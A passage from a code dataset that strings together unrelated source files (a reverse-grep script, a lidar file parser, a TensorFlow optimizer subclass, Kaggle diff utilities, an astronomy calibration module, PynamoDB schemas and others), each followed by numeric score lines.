Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction bias (float): halo bias xi_mm (float or array like): matter correlation function at r delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k) P = _ArrayWrapper(P) xi_mm = _ArrayWrapper(xi_mm) xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_DK_app2(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, bias, xi_mm.cast(), xi.cast()) return xi.finish()
2.40625
2
Tools/scripts/rgrep.py
ystk/debian-python3.1
1
16746
<reponame>ystk/debian-python3.1 #! /usr/bin/env python """Reverse grep. Usage: rgrep [-i] pattern file """ import sys import re import getopt def main(): bufsize = 64*1024 reflags = 0 opts, args = getopt.getopt(sys.argv[1:], "i") for o, a in opts: if o == '-i': reflags = reflags | re.IGNORECASE if len(args) < 2: usage("not enough arguments") if len(args) > 2: usage("exactly one file argument required") pattern, filename = args try: prog = re.compile(pattern, reflags) except re.error as msg: usage("error in regular expression: %s" % str(msg)) try: f = open(filename) except IOError as msg: usage("can't open %s: %s" % (repr(filename), str(msg)), 1) f.seek(0, 2) pos = f.tell() leftover = None while pos > 0: size = min(pos, bufsize) pos = pos - size f.seek(pos) buffer = f.read(size) lines = buffer.split("\n") del buffer if leftover is None: if not lines[-1]: del lines[-1] else: lines[-1] = lines[-1] + leftover if pos > 0: leftover = lines[0] del lines[0] else: leftover = None lines.reverse() for line in lines: if prog.search(line): print(line) def usage(msg, code=2): sys.stdout = sys.stderr print(msg) print(__doc__) sys.exit(code) if __name__ == '__main__': main()
2.953125
3
licel_format_parser/main.py
IFAEControl/lidar-cli
0
16747
<reponame>IFAEControl/lidar-cli import struct f = open("c0610400.102200", 'rb') class DateTime: def __init__(self): line = f.readline().strip() self._letter = chr(line[0]) self._year = line[1:3].decode("utf-8") self._month = int(chr(line[3]), 16) self._day = line[4:6].decode("utf-8") self._hour = line[6:8].decode("utf-8") self._minute = line[9:11].decode("utf-8") self._second = line[11:13].decode("utf-8") self._millis = line[13:15].decode("utf-8") def __str__(self): date = "{}/{}/{} ".format(self._day, self._month, self._year) time = "{}:{}:{}.{}".format(self._hour, self._minute, self._second, self._millis) return "{} {}".format(date, time) class Location: def __init__(self): line = f.readline().strip() self._location = line[0:9].strip().decode("utf-8") self._start_time = line[9:28].decode("utf-8") self._stop_time = line[29:48].decode("utf-8") self._higt_asl = line[49:53].decode("utf-8") self._longitude = line[54:60].decode("utf-8") self._latitude = line[61:67].decode("utf-8") self._zenith_angle = line[68:70].decode("utf-8") def __str__(self): return "Location: {}\nStart: {}\nEnd: {}\nAltitude: {}, longitude: {}, latitude: {}, zenith_angle: {}".format( self._location, self._start_time, self._stop_time, self._higt_asl, self._longitude, self._latitude, self._zenith_angle ) class LaserData: def __init__(self): line = f.readline().strip() self.shots_laser_1 = line[0:7].decode("utf-8") # XXX: Official documentation (22 february 2019) states that there should be 5 numbers but official licel app # only returns 4 self.pulse_freq_1 = line[8:12].decode("utf-8") self.shots_laser_2 = line[13:20].decode("utf-8") # XXX: Official documentation (22 february 2019) states that there should be 5 numbers but official licel app # only returns 4 self.pulse_freq_2 = line[21:24].decode("utf-8") self.datasets_num = int(line[26:28].decode("utf-8")) self.undocumented_laser_3 = line[29:36].decode("utf-8") self.undocumented_freq_3 = line[37:41].decode("utf-8") def __str__(self): return 
str(self.datasets_num) class DatasetDescription: def __init__(self): line = f.readline().strip() self._active = bool(int(chr(line[0]))) self._analog = False self._phontocounting = False tmp = bool(int(chr(line[2]))) if tmp: self._phontocounting = True else: self._analog = True self._laser = int(chr(line[4])) self._bins = line[6:11].decode("utf-8") self._one = line[12] self._pmt_voltage = line[14:18].decode("utf-8") # XXX: Docs say two digits before the dot. But there is only one. self._binwith = line[19:23].decode("utf-8") self._wavelength = line[24:29].decode("utf-8") self._polarisation = None tmp = chr(line[31]) if tmp == 'o': self._polarisation = "No" elif tmp == 's': self._polarisation = "Perpendicular" elif tmp == "i": self._polarisation = "parallel" self._adc_bits = line[43:45].decode("utf-8") self._number_of_shots = line[46:52].decode("utf-8") self._analog_range_or_disc = line[53:58].decode("utf-8") # XXX: According to the documentation BT = analog but in our samples from the official software BT = photon # we only read the TR number self._tr = int(chr(line[-1])) def __str__(self): print(self._tr) return "Active: {}, analog: {}, photoncounting: {}, " \ "laser: {}, bins: {}".format(self._active, self._analog, self._phontocounting, self._laser, self._bins) def read_dataset(file): ch = file.read(1) buf = [] while True: if chr(ch[0]) == '\n' and chr(buf[-1]) == '\r': break buf.append(ch[0]) ch = file.read(1) buf.append(ch[0]) return bytes(buf) class Data: def __init__(self): # \r\n f.readline() # Actual dataset, without \r\n line = read_dataset(f)[:-2] line = read_dataset(f)[:-2] line = read_dataset(f)[:-2] int_array = [x[0] for x in struct.iter_unpack('<I', line)] converted = [(x/58)*(500/(2**16-1)) for x in int_array] print(converted) class Header: def __init__(self): self._date_time = DateTime() self._location = Location() self._laser_data = LaserData() self._datasets_descriptions = [] for _ in range(self._laser_data.datasets_num): 
self._datasets_descriptions.append(DatasetDescription()) self._data = Data() def __str__(self): print(self._laser_data) for i in self._datasets_descriptions: print(i) return "{}\n{}".format(self._date_time, self._location) h = Header() print(h)
2.5625
3
built-in/TensorFlow/Official/nlp/BertLarge_ID0634_for_TensorFlow2.X/bert/tf2_common/training/optimizer_v2modified.py
Ascend/modelzoo
12
16748
<reponame>Ascend/modelzoo # Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Modified optimizer_v2 implementation enabling XLA across variable updates.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf from tensorflow.python.distribute import distribution_strategy_context as distribute_ctx from tensorflow.python.distribute import parameter_server_strategy from tensorflow.python.framework import ops from tensorflow.python.framework import dtypes from tensorflow.python.keras import backend from tensorflow.python.keras.optimizer_v2 import optimizer_v2 from tensorflow.python.keras.optimizer_v2 import utils as optimizer_utils from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import variables as tf_variables class OptimizerV2Modified(optimizer_v2.OptimizerV2): """This is a subclass optimizer that performs variable updates in Distribution Strategy replica context. OptimizerV2 base class is currently under refactoring and will have better support of this. Please refer to optimizer_v2.OptimizerV2 for more details regarding the APIs. """ def __init__(self, name, use_experimental_compile=False, **kwargs): """Create a new Optimizer. Args: name: Optional name prefix for variables and ops created by the optimizer. 
use_experimental_compile: when set to True, use experimental_compile on the _distributed_apply function. """ super(OptimizerV2Modified, self).__init__(name=name, **kwargs) self.use_experimental_compile = use_experimental_compile def apply_gradients(self, grads_and_vars, name=None, experimental_aggregate_gradients=True): """Apply gradients to variables. Only the last two lines are different from optimizer_v2.OptimizerV2. Args: grads_and_vars: List of (gradient, variable) pairs. name: Optional name for the returned operation. Default to the name passed to the `Optimizer` constructor. experimental_aggregate_gradients: Whether to sum gradients from different replicas in the presense of `tf.distribute.Strategy`. If False, it's user responsibility to aggregate the gradients. Default to True. Returns: An `Operation` that applies the specified gradients. The `iterations` will be automatically increased by 1. Raises: TypeError: If `grads_and_vars` is malformed. ValueError: If none of the variables have gradients. RuntimeError: If called in cross-replica context. """ # pylint: disable=protected-access grads_and_vars = optimizer_utils.filter_empty_gradients(grads_and_vars) # pylint: enable=protected-access var_list = [v for (_, v) in grads_and_vars] with ops.name_scope_v2(self._name): # Create iteration if necessary. with ops.init_scope(): self._create_all_weights(var_list) if not grads_and_vars: # Distribution strategy does not support reducing an empty list of # gradients return control_flow_ops.no_op() if distribute_ctx.in_cross_replica_context(): raise RuntimeError( "`apply_gradients() cannot be called in cross-replica context. 
" "Use `tf.distribute.Strategy.run` to enter replica " "context.") strategy = distribute_ctx.get_strategy() if (not experimental_aggregate_gradients and strategy and isinstance( strategy.extended, parameter_server_strategy.ParameterServerStrategyExtended)): raise NotImplementedError( "`experimental_aggregate_gradients=False is not supported for " "ParameterServerStrategy and CentralStorageStrategy") apply_state = self._prepare(var_list) if experimental_aggregate_gradients: grads_and_vars = self._transform_unaggregated_gradients(grads_and_vars) grads_and_vars = self._aggregate_gradients(grads_and_vars) grads_and_vars = self._transform_gradients(grads_and_vars) self._distributed_apply(None, grads_and_vars, name, apply_state) return self._iterations.assign_add(1, read_value=False) def _distributed_apply_org(self, distribution, grads_and_vars, name, apply_state): """`apply_gradients` using a `DistributionStrategy`. This is the _distributed_apply function in optimizer_v2, returning a list of ops. 
""" def apply_grad_to_update_var(var, grad): """Apply gradient to variable.""" if isinstance(var, ops.Tensor): raise NotImplementedError("Trying to update a Tensor ", var) apply_kwargs = {} if isinstance(grad, ops.IndexedSlices): if var.constraint is not None: raise RuntimeError( "Cannot use a constraint function on a sparse variable.") if "apply_state" in self._sparse_apply_args: apply_kwargs["apply_state"] = apply_state return self._resource_apply_sparse_duplicate_indices( grad.values, var, grad.indices, **apply_kwargs) if "apply_state" in self._dense_apply_args: apply_kwargs["apply_state"] = apply_state update_op = self._resource_apply_dense(grad, var, **apply_kwargs) if var.constraint is not None: with ops.control_dependencies([update_op]): return var.assign(var.constraint(var)) else: return update_op update_ops = [] with ops.name_scope(name or self._name, skip_on_eager=True): for grad, var in grads_and_vars: update_ops.append(apply_grad_to_update_var(var, grad)) return control_flow_ops.group(*update_ops) def _distributed_apply(self, distribution, grads_and_vars, name, apply_state): if self.use_experimental_compile: self._distributed_apply_compile(distribution, grads_and_vars, name, apply_state) else: self._distributed_apply_org(distribution, grads_and_vars, name, apply_state) #@tf.function(experimental_compile=True) def _distributed_apply_compile(self, distribution, grads_and_vars, name, apply_state): """This is a warpper, to return a tensor, making tf.func() happy.""" self._distributed_apply_org(distribution, grads_and_vars, name, apply_state) return tf.ones((), dtype=tf.bool)
1.734375
2
src/data/utils.py
behavioral-data/multiverse
0
16749
"""Utility helpers for downloading and parsing Kaggle notebook/diff data."""
import os
import errno
import requests
import glob
import json

from tqdm import tqdm
# NOTE(review): the selenium imports below are unused in this module; they
# are kept in case other modules import them from here -- confirm before
# removing.
from selenium import webdriver
from selenium.webdriver.firefox.options import Options


def make_sure_path_exists(path):
    """Create directory *path* (including parents), tolerating existence.

    Re-raises any OSError other than "already exists".
    """
    try:
        os.makedirs(path)
    except OSError as exception:
        # Only swallow the "directory already exists" error.
        if exception.errno != errno.EEXIST:
            raise


def download_file(url, out_path, file_mode="wb"):
    """Download *url* and write the body to *out_path*.

    The body is written only when the response status is truthy
    (i.e. not a 4xx/5xx error per requests' Response.__bool__).

    Returns True iff the response status code is exactly 200 (requests.codes.ok).
    """
    response = requests.get(url)
    if response:
        # Context manager guarantees the handle is closed even if the
        # write raises (the original left the file open in that case).
        with open(out_path, file_mode) as out_file:
            out_file.write(response.content)
    return response.status_code == requests.codes.ok


def version_path_to_components(path):
    """Split a ``.../<comp_name>/<slug_id>/<version_id>.<ext>`` path.

    Returns a dict with keys ``version_id``, ``slug_id`` and ``comp_name``.
    """
    slug_path, version_file = os.path.split(path)
    version_id = version_file.split(".")[0]
    comp_path, slug_id = os.path.split(slug_path)
    comp_name = os.path.basename(comp_path)
    return {"version_id": version_id,
            "slug_id": slug_id,
            "comp_name": comp_name}


class CompetitionReader(object):
    """Reads notebook versions stored as ``<path>/<slug_id>/<version_id>.json``."""

    def __init__(self, path, python_only=False):
        self.path = path
        # One sub-directory per kernel slug.
        self.slug_ids = [os.path.basename(x)
                         for x in glob.glob(os.path.join(self.path, "*"))]
        self.comp_name = os.path.basename(self.path)
        self.python_only = python_only

    def apply_to_slugs(self, fn):
        """Yield ``fn(versions)`` for each slug's list of notebook dicts."""
        for slug_id in self.slug_ids:
            versions = self.load_slug_versions(slug_id)
            yield fn(versions)

    def load_slug_versions(self, slug_id):
        """Load every parseable version JSON for *slug_id*.

        Files that are not valid JSON, not JSON objects, or (when
        ``python_only`` is set) not Python notebooks are skipped silently.
        Each returned dict is annotated with ``version_id`` and ``path``.
        """
        versions = []
        for path in glob.glob(os.path.join(self.path, slug_id, "*.json")):
            with open(path) as version_file:
                filename = os.path.basename(path)
                version_id = os.path.splitext(filename)[0]
                try:
                    version = json.load(version_file)
                    if not isinstance(version, dict):
                        continue
                except json.decoder.JSONDecodeError:
                    continue
                if self.python_only:
                    try:
                        if not version["metadata"]["language_info"]["name"] == "python":
                            continue
                    except KeyError:
                        # Notebooks without language metadata are excluded.
                        continue
                version["version_id"] = version_id
                version["path"] = path
                versions.append(version)
        return versions


def write_jsonl(open_file, data, mode="a"):
    """Write each item of *data* as one JSON line to the open file handle.

    ``mode`` is unused (the caller already opened the file); kept for
    backward compatibility with existing call sites.
    """
    for datum in data:
        open_file.write(json.dumps(datum))
        open_file.write("\n")


def load_jsonl(path):
    """Read a JSONL file and return the list of decoded objects."""
    lines = []
    with open(path, 'r', encoding='utf-8') as f:
        for line in f:
            loaded_line = json.loads(line)
            lines.append(loaded_line)
    return lines


def is_git_line(line):
    """True when *line* starts with a diff marker ('+' or '-')."""
    return len(line) > 0 and line[0] in ["+", "-"]


def remove_git_chars(line):
    """Strip a leading '+'/'-' diff marker, if present."""
    if is_git_line(line):
        return line[1:]
    else:
        return line


class KaggleDiffsReader():
    """Load a JSONL file of notebook-cell diffs into memory.

    Each input line must be a JSON object with at least the keys
    ``metadata`` and ``cell_diff`` (a unified-diff-style string).
    """

    def __init__(self, diff_path):
        self.diff_path = diff_path
        self.diffs = []
        with open(self.diff_path, 'r', encoding='utf-8') as f:
            for line in tqdm(f, desc="Loading Diffs"):
                diff_line = json.loads(line)
                orig, new = self.split_orig_and_new(diff_line)
                diff = {
                    "metadata": diff_line["metadata"],
                    "orig": orig,
                    "new": new,
                    # BUGFIX: previously read diff_line["celll_diff"]
                    # (three l's), contradicting split_orig_and_new(),
                    # which reads "cell_diff" from the very same object --
                    # so well-formed input always raised KeyError here.
                    "cell_diff": diff_line["cell_diff"]
                }
                self.diffs.append(diff)

    def __len__(self):
        return len(self.diffs)

    def __getitem__(self, i):
        return self.diffs[i]

    def remove_git_chars(self, line):
        """Strip a leading '+'/'-'; assumes *line* is non-empty."""
        if line[0] in ["+", "-"]:
            return line[1:]
        else:
            return line

    def split_orig_and_new(self, diff):
        """Split a diff dict's ``cell_diff`` text into (orig, new) strings.

        ``orig`` keeps context and removed lines; ``new`` keeps context and
        added lines. Marker characters are stripped from kept lines.
        """
        # TODO: Current preserves the plus or minus
        lines = diff["cell_diff"].split("\n")
        orig = [self.remove_git_chars(x) for x in lines
                if len(x) > 0 and x[0] != "+"]
        new = [self.remove_git_chars(x) for x in lines
               if len(x) > 0 and x[0] != "-"]
        return "\n".join(orig), "\n".join(new)


def split_orig_and_new(diff):
    """Module-level variant: split a raw diff *string* into (orig, new)."""
    lines = diff.split("\n")
    orig = [remove_git_chars(x) for x in lines if len(x) > 0 and x[0] != "+"]
    new = [remove_git_chars(x) for x in lines if len(x) > 0 and x[0] != "-"]
    return "\n".join(orig), "\n".join(new)


def get_inserted_and_removed(diff, as_string=False):
    """Return the added ('+') and removed ('-') lines of a diff string.

    Returns two lists, or two newline-joined strings when *as_string*.
    """
    lines = diff.split("\n")
    inserted = [remove_git_chars(x) for x in lines if len(x) > 0 and x[0] == "+"]
    removed = [remove_git_chars(x) for x in lines if len(x) > 0 and x[0] == "-"]
    if as_string:
        return "\n".join(inserted), "\n".join(removed)
    else:
        return inserted, removed
2.609375
3
LeetCode/Product and Sum/Subtract_Product_And_Sum.py
GSri30/Competetive_programming
22
16750
class Solution:
    """LeetCode 1281: difference between digit product and digit sum."""

    def subtractProductAndSum(self, n: int) -> int:
        """Return (product of decimal digits of n) - (sum of decimal digits of n)."""
        digits = [int(ch) for ch in str(n)]
        product = 1
        for d in digits:
            product *= d
        return product - sum(digits)
3.25
3
jocular/calibrator.py
MartinCooke/jocular
6
16751
''' Handles calibration library and calibration of subs. ''' import os.path import numpy as np from scipy.stats import trimboth from kivy.app import App from loguru import logger from kivy.properties import BooleanProperty, DictProperty, NumericProperty from kivy.core.window import Window from jocular.table import Table from jocular.utils import make_unique_filename from jocular.component import Component from jocular.settingsmanager import Settings from jocular.image import Image, save_image, fits_in_dir date_time_format = '%d %b %y %H:%M' class Calibrator(Component, Settings): save_settings = ['apply_dark', 'apply_flat', 'apply_bias'] masters = DictProperty({}) apply_flat = BooleanProperty(False) apply_dark = BooleanProperty(False) apply_bias = BooleanProperty(False) use_l_filter = BooleanProperty(True) exposure_tol = NumericProperty(5) temperature_tol = NumericProperty(5) dark_days_tol = NumericProperty(1) flat_days_tol = NumericProperty(60) tab_name = 'Calibration' configurables = [ ('use_l_filter', {'name': 'use light flat?', 'switch': '', 'help': 'If there is no flat for the given filter, use a light flat if it exists'}), ('exposure_tol', {'name': 'exposure tolerance', 'float': (0, 30, 1), 'fmt': '{:.0f} seconds', 'help': 'When selecting a dark, select those within this exposure tolerance'}), ('temperature_tol', {'name': 'temperature tolerance', 'float': (0, 40, 1), 'fmt': '{:.0f} degrees', 'help': 'When selecting a dark, restrict to those within this temperature tolerance'}), ('dark_days_tol', {'name': 'dark age tolerance', 'float': (0, 300, 1), 'fmt': '{:.0f} days', 'help': 'Maximum age of darks to use if no temperature was specified'}), ('flat_days_tol', {'name': 'flat age tolerance', 'float': (0, 300, 1), 'fmt': '{:.0f} days', 'help': 'Maximum age of flats to use'}), ] def __init__(self, **kwargs): super().__init__(**kwargs) self.app = App.get_running_app() self.calibration_dir = self.app.get_path('calibration') self.masters = {} # map from name to FITs 
Image instance self.library = {} # map from name to calibration table info ''' construct above dicts from calibration FITs in calibration directory ''' for f in fits_in_dir(self.calibration_dir): path = os.path.join(self.calibration_dir, f) try: s = Image(path) if s.is_master: self.add_to_library(s) except Exception as e: logger.warning('Calibrator: unable to parse calibration {:} ({:})'.format(f, e)) def on_new_object(self, *args): n_masters = len(self.library) if n_masters > 0: self.info('{:d} masters'.format(n_masters)) else: self.info('no masters') def add_to_library(self, m): ''' called on initialisation and when we save a new master ''' # keys are full names so they can be reliably deleted self.masters[m.fullname] = m self.library[m.fullname] = { 'name': m.name, 'type': m.sub_type, 'exposure': str(m.exposure) if m.exposure is not None else '???', 'temperature': str(m.temperature) if m.temperature is not None else '???', 'filter': m.filter, 'created': m.create_time.strftime(date_time_format), 'shape_str': m.shape_str, 'age': m.age, 'nsubs': m.nsubs if m.nsubs is not None else 0 } def create_master(self, sub_type=None, exposure=None, temperature=None, filt=None): ''' Called by ObjectIO to save an existing stack capture by Jocular as a calibration master ''' logger.info('save master type {:} expo {:} temp {:} filt {:}'.format( sub_type, exposure, temperature, filt)) stacker = Component.get('Stacker') # force the use of method that the user has chosen or set up by default for this type of calib master = stacker.get_stack(filt, calibration=True) ''' Apply bad pixel mapping to calibration frames If dark, find hot pixels in master and remove, otherwise use existing BPM NB not fully tested ''' bpm = Component.get('BadPixelMap') if sub_type == 'dark': master = bpm.do_bpm(master, bpm.find_hot_pixels(master)) logger.debug('created BPM from darks and applied it') else: master = bpm.do_bpm(master) logger.debug('applied BPM to master') ''' Flats were divided thru by their 
robust mean to account for level differences but then scaled to 50% to enable B/W controls; so multiply by 2 ''' if sub_type == 'flat': master = 2 * master self.save_master(data=master, exposure=exposure, filt=filt, temperature=temperature, sub_type=sub_type, nsubs=stacker.get_selected_sub_count()) # add to notes field of current DSO Component.get('Notes').notes = 'exposure {:} filter {:} temperature {:}'.format(exposure, filt, temperature) def save_master(self, data=None, exposure=None, filt=None, temperature=None, sub_type=None, nsubs=None): ''' Save master and add to library to make it available immediately. Called both by create_master above and by the Watched camera for any alien master subs. The difference is that create_master above does BPM/flat handling etc so only applies to natively-captured calibration masters. ''' logger.info('new master type {:} expo {:} temp {:} filt {:} nsubs {:}'.format( sub_type, exposure, temperature, filt, nsubs)) name = 'master{:}.fit'.format(sub_type) path = make_unique_filename(os.path.join(self.calibration_dir, name)) save_image(data=data, path=path, exposure=exposure, filt=filt, temperature=temperature, sub_type='master ' + sub_type, nsubs=nsubs) self.add_to_library(Image(path)) def calibrate(self, sub): # Given a light sub, apply calibration. Fails silently if no suitable calibration masters. 
sub.calibrations = set({}) if not self.library: self.info('no library') return if not (self.apply_dark or self.apply_bias or self.apply_flat): self.info('none') return # get all masters (check speed, but should be quick) dark = self.get_dark(sub) flat = self.get_flat(sub) bias = self.get_bias(sub) logger.debug('D {:} F {:} B {:}'.format(dark, flat, bias)) D = self.get_master(dark) # if D is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(dark, np.min(D), np.max(D), np.median(D), np.mean(D))) F = self.get_master(flat) # if F is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(flat, np.min(F), np.max(F), np.median(F), np.mean(F))) B = self.get_master(bias) # if B is not None: # print('{:} min {:} max {:} median {:} mean {:}'.format(bias, np.min(B), np.max(B), np.median(B), np.mean(B))) im = sub.get_image() if self.apply_dark and self.apply_flat: if dark is not None and flat is not None: im = (im - D) / F sub.calibrations = {'dark', 'flat'} elif dark is not None: im = im - D sub.calibrations = {'dark'} elif flat is not None: if bias is not None: sub.calibrations = {'flat', 'bias'} im = (im - B) / F else: sub.calibrations = {'flat'} im = im / F # inadvisable, but we allow it elif self.apply_dark: if dark is not None: im = im - D sub.calibrations = {'dark'} elif self.apply_flat: if flat is not None: if bias is not None: sub.calibrations = {'flat', 'bias'} im = (im - B) / F else: sub.calibrations = {'flat'} im = im / F elif self.apply_bias: if bias is not None: sub.calibrations = {'bias'} im = im - B # limit im[im < 0] = 0 im[im > 1] = 1 sub.image = im applied = ' '.join(list(sub.calibrations)) if applied: self.info(applied) else: self.info('none suitable') def get_dark(self, sub): # Find suitable dark for this sub given its parameters if sub.exposure is None: return None # choose darks that are the right shape with exposure within tolerance darks = {k: v for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 
'dark' and v.exposure is not None and abs(v.exposure - sub.exposure) < self.exposure_tol} temperature = Component.get('Session').temperature if temperature is not None: # we know temperature, select those with temperatures and within tolerance darks = [k for k, v in darks.items() if v.temperature is not None and abs(v.temperature - temperature) < self.temperature_tol] else: # find those within date tolerance (set to 1 to get darks in current session) darks = [k for k, v in darks.items() if v.age < self.dark_days_tol] # if we have darks, return name of first one return darks[0] if len(darks) > 0 else None def get_bias(self, sub): # get the most recent bias bias = {k: v.age for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 'bias' } return min(bias, key=bias.get) if len(bias) > 0 else None def get_flat(self, sub): # flats of right shape flats = {k:v for k, v in self.masters.items() if v.shape == sub.shape and v.sub_type == 'flat'} # flat in required filter if sub.filter is not None: flats_in_filt = {k: v for k, v in flats.items() if v.filter is not None and v.filter == sub.filter} else: flats_in_filt = {} # if we have none and can use L filter, use these if (len(flats_in_filt) == 0) and self.use_l_filter: flats_in_filt = {k:v for k, v in flats.items() if v.filter == 'L'} # do we have any now? if not, return if len(flats_in_filt) == 0: return None # find any within day tolerance, noting that this compares the date of the flat with # the date of the sub (i.e. 
not necessarily the current date) flats = {k: abs(v.create_time - sub.create_time).days for k,v in flats_in_filt.items()} flats = {k: v for k, v in flats.items() if v <= self.flat_days_tol} # find most recent if there is a choice for k in sorted(flats, key=flats.get): return k return None def get_master(self, name): if name is None: return None # Retrieve image (NB loaded on demand, so effectively a cache) return self.masters[name].get_image() def _most_subs(self, cands): c = {k: cands[k]['nsubs'] for k in cands.keys()} return max(c, key=c.get) def calibrate_flat(self, sub): ''' Perform calibrations on flat which include subtracting bias if available , and rescaling so the mean intensity is .5 (because outlier rejection methods used to combine flat subs work best with normalised frames due to changing light levels; the value of .5 is so that we can use B & W controls; we rescale to a mean of 1 when saving since this is what a good flat needs for dividing) ''' im = sub.get_image() # subtract bias if available bias = self.get_bias(sub) if bias is not None: #print('subtracting bias') im = im - self.get_master(bias) # normalise by mean of image in central 3rd zone perc = 75 # retain central 75% of points when computing mean w, h = im.shape w1, w2 = int(w / 3), int(2 * w / 3) h1, h2 = int(h / 3), int(2 * h / 3) imr = im[h1: h2, w1: w2] robust_mean = np.mean(trimboth(np.sort(imr.ravel(), axis=0), (100 - perc)/100, axis=0), axis=0) sub.image = .5 * im / robust_mean def build_calibrations(self): ''' Contruct table from library ''' return Table( size=Window.size, data=self.library, name='Calibration masters', description='Calibration masters', cols={ 'Name': {'w': 300, 'align': 'left', 'field': 'name'}, 'Type': {'w': 60, 'field': 'type', 'align': 'left'}, 'Exposure': {'w': 80, 'field': 'exposure'}, 'Temp. 
C': {'w': 80, 'field': 'temperature', 'type': str}, 'Filter': {'w': 80, 'field': 'filter'}, 'Created': {'w': 180, 'field': 'created', 'sort': {'DateFormat': date_time_format}}, 'Size': {'w': 110, 'field': 'shape_str'}, 'Age': {'w': 50, 'field': 'age', 'type': int}, 'Subs': {'w': 50, 'field': 'nsubs', 'type': int} }, actions={'move to delete dir': self.move_to_delete_folder}, on_hide_method=self.app.table_hiding ) def show_calibration_table(self, *args): ''' Called when user clicks 'library' on GUI ''' if not hasattr(self, 'calibration_table'): self.calibration_table = self.build_calibrations() self.app.showing = 'calibration' # check for redraw if self.calibration_table not in self.app.gui.children: self.app.gui.add_widget(self.calibration_table, index=0) self.calibration_table.show() def move_to_delete_folder(self, *args): objio = Component.get('ObjectIO') for nm in self.calibration_table.selected: if nm in self.library: objio.delete_file(os.path.join(self.calibration_dir, nm)) del self.library[nm] del self.masters[nm] logger.info('deleted {:} calibration masters'.format(len(self.calibration_table.selected))) self.calibration_table.update()
2.09375
2
test/office_schema.py
chrismaille/marshmallow-pynamodb
3
16752
from test.office_model import Headquarters, Office
from marshmallow import fields
from pynamodb.attributes import DiscriminatorAttribute
from marshmallow_pynamodb import ModelSchema


class OfficeSchema(ModelSchema):
    """Marshmallow schema for the PynamoDB ``Office`` model.

    The set-valued PynamoDB attributes (``NumberSetAttribute`` /
    ``UnicodeSetAttribute``) are overridden with ordered ``List`` fields so
    that serialisation keeps element order stable.
    """

    numbers = fields.List(fields.Integer)
    departments = fields.List(fields.String)
    security_number = fields.Str(allow_none=True)
    cls = DiscriminatorAttribute()

    class Meta:
        """Bind this schema to the ``Office`` model."""

        model = Office


class HQSchema(OfficeSchema):
    """Schema whose fields are introspected from a parent *schema*.

    Fields come from the parent marshmallow ``ModelSchema``
    (``OfficeSchema``); only ``Meta.model`` is redirected to
    ``Headquarters``.
    """

    class Meta:
        model = Headquarters


class HeadquartersSchema(ModelSchema):
    """Schema whose fields are introspected from the PynamoDB *model*.

    Fields are derived directly from the ``Headquarters`` model (and its
    parent ``Office`` model) rather than from a parent schema.
    """

    class Meta:
        model = Headquarters
2.546875
3
energy_demand/initalisations/initialisations.py
willu47/energy_demand
0
16753
"""Helper initialising functions """ #pylint: disable=I0011, C0321, C0301, C0103, C0325, R0902, R0913, no-member, E0213 def init_fuel_tech_p_by(all_enduses_with_fuels, nr_of_fueltypes): """Helper function to define stocks for all enduse and fueltype Parameters ---------- all_enduses_with_fuels : dict Provided fuels nr_of_fueltypes : int Nr of fueltypes Returns ------- fuel_tech_p_by : dict """ fuel_tech_p_by = {} for enduse in all_enduses_with_fuels: fuel_tech_p_by[enduse] = dict.fromkeys(range(nr_of_fueltypes), {}) return fuel_tech_p_by def dict_zero(first_level_keys): """Initialise a dictionary with one level Parameters ---------- first_level_keys : list First level data Returns ------- one_level_dict : dict dictionary """ one_level_dict = dict.fromkeys(first_level_keys, 0) # set zero as argument return one_level_dict def service_type_tech_by_p(lu_fueltypes, fuel_tech_p_by): """Initialise dict and fill with zeros Parameters ---------- lu_fueltypes : dict Look-up dictionary fuel_tech_p_by : dict Fuel fraction per technology for base year Return ------- service_fueltype_tech_by_p : dict Fraction of service per fueltype and technology for base year """ service_fueltype_tech_by_p = {} for fueltype_int in lu_fueltypes.values(): service_fueltype_tech_by_p[fueltype_int] = dict.fromkeys(fuel_tech_p_by[fueltype_int].keys(), 0) return service_fueltype_tech_by_p
3.078125
3
npd_well_decoder/__init__.py
fmell/npd-well-name-decoder
0
16754
<reponame>fmell/npd-well-name-decoder from .npd import parse_wellbore_name
0.867188
1
Lib/site-packages/wx-3.0-msw/wx/tools/Editra/src/util.py
jickieduan/python27
5
16755
<reponame>jickieduan/python27 ############################################################################### # Name: util.py # # Purpose: Misc utility functions used through out Editra # # Author: <NAME> <<EMAIL>> # # Copyright: (c) 2008 <NAME> <<EMAIL>> # # License: wxWindows License # ############################################################################### """ This file contains various helper functions and utilities that the program uses. """ __author__ = "<NAME> <<EMAIL>>" __svnid__ = "$Id: util.py 72623 2012-10-06 19:33:06Z CJP $" __revision__ = "$Revision: 72623 $" #--------------------------------------------------------------------------# # Imports import os import sys import mimetypes import encodings import codecs import urllib2 import wx # Editra Libraries import ed_glob import ed_event import ed_crypt import dev_tool import syntax.syntax as syntax import syntax.synglob as synglob import ebmlib _ = wx.GetTranslation #--------------------------------------------------------------------------# class DropTargetFT(wx.PyDropTarget): """Drop target capable of accepting dropped files and text @todo: has some issues with the clipboard on windows under certain conditions. They are not fatal but need fixing. 
